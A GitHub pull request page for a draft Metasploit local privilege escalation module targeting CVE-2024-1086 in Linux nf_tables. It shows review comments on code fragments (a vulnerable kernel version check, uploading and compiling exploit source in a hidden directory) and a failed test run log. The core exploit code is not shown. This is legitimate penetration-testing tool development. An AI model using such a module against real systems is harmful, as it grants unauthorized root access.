Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

WIP: LPE CVE-2024-1086 #19625

Draft
wants to merge 1 commit into
base: master
Choose a base branch
from
Draft

WIP: LPE CVE-2024-1086 #19625

wants to merge 1 commit into from

Conversation

h00die
Copy link
Contributor

@h00die h00die commented Nov 8, 2024

Fixes: #19153

WIP exploit for CVE-2024-1086 . Running the exploit by hand on the box seems fairly reliable. However running it through metasploit currently results in about 75% hard lock of the box either instantly, or within 6min. 25% of the time its perfect though!

Only been testing the live build functionality, not the 'drop a pre-complied binary' branch

I forgot to bring along a bunch of the library files as well, so need to add those back.

Comment on lines +81 to +91
release = kernel_release
if (
Rex::Version.new(release.split('-').first) >= Rex::Version.new('5.15.0') &&
Rex::Version.new(release.split('-').first) < Rex::Version.new('6.0')
) ||
(
Rex::Version.new(release.split('-').first) < Rex::Version.new('6.6') &&
Rex::Version.new(release.split('-').first) >= Rex::Version.new('6.0')
)
return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
end
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
release = kernel_release
if (
Rex::Version.new(release.split('-').first) >= Rex::Version.new('5.15.0') &&
Rex::Version.new(release.split('-').first) < Rex::Version.new('6.0')
) ||
(
Rex::Version.new(release.split('-').first) < Rex::Version.new('6.6') &&
Rex::Version.new(release.split('-').first) >= Rex::Version.new('6.0')
)
return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
end
release = kernel_release().split('-').first
if release.between(Rex::Version.new('5.15.0'), Rex::Version.new('6.0'))
return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
elsif release.between(Rex::Version.new('6.0'), Rex::Version.new('6.6'))
return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
end

but it seems that this can be simplified even further to:

    release = kernel_release().split('-').first
    if release.between(Rex::Version.new('5.15.0'), Rex::Version.new('6.6'))
      return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
    end

end

def check_musl_tools?
lib = cmd_exec('dpkg --get-selections | grep musl-tools')
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This will only work on Debian :/

zip.add_file(file.split('CVE-2024-1086/')[1], file_contents)
end
print_status('Finished creating exploit source zip, uploading...')
zip_path = "#{nested_base}/.#{rand_text_alphanumeric(5..10)}.zip"
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can't the files be concatenated instead?

fail_with Failure::BadConfig, "#{base_dir} is not writable"
end

nested_base = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

A couple of IDS are flagging binary execution happening instead hidden folders. I think it'd be better to let the user specify the full path of the folder.

Comment on lines +147 to +153
if command_exists?('python3')
cmd_exec "python3 -m zipfile -e #{zip_path} #{nested_base}"
else
cmd_exec "unzip #{zip_path} -d #{nested_base}"
end
print_status('Compiling')
cmd_exec "cd #{nested_base}; make"
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The nested_base value contains a portion that is user specified from the WritableDir datastore option. If that value contains a space, then these commands will fail.

We've recently added a new command execution API to handle these cases correctly and t should generally be used when the command is not static.

As an example the first one should be create_process('python3', args: ['-m', 'zipfile', '-e', zip_path, nested_base]).

The new #create_process method will take the arguments and ensure that they are escaped correctly for you given the context in which they're executed (platform, session type, etc.).

'Notes' => {
'Stability' => [CRASH_OS_DOWN],
'Reliability' => [UNRELIABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is SCREEN_EFFECTS due to the system locking up here? If not would you mind dropping a comment to clarify.

@msutovsky-r7
Copy link
Contributor

Not really sure if it applies here as this PR is marked as draft, but I have been doing review for #19745 and noticed following:

msf6 exploit(linux/local/netfilter_nf_tables_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/netfilter_nf_tables_priv_esc) > run
[*] Started reverse TCP handler on 192.168.95.128:4444 
[!] SESSION may not be compatible with this module:
[!]  * Unknown session arch
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Kernel version 5.15.0-126-generic appears to be vulnerable
[*] Creating /tmp/.AwYfaDUz
[-] Exploit failed: ArgumentError wrong number of arguments (given 1, expected 2)
[*] Exploit completed, but no session was created.

Not really sure if it's caused by escape fix, but it might be worth having it noted here. I'll investigate more later on.

@msutovsky-r7 msutovsky-r7 self-assigned this Dec 20, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
Status: Waiting on Contributor
Development

Successfully merging this pull request may close these issues.

Linux LPE (CVE-2024-1086)
4 participants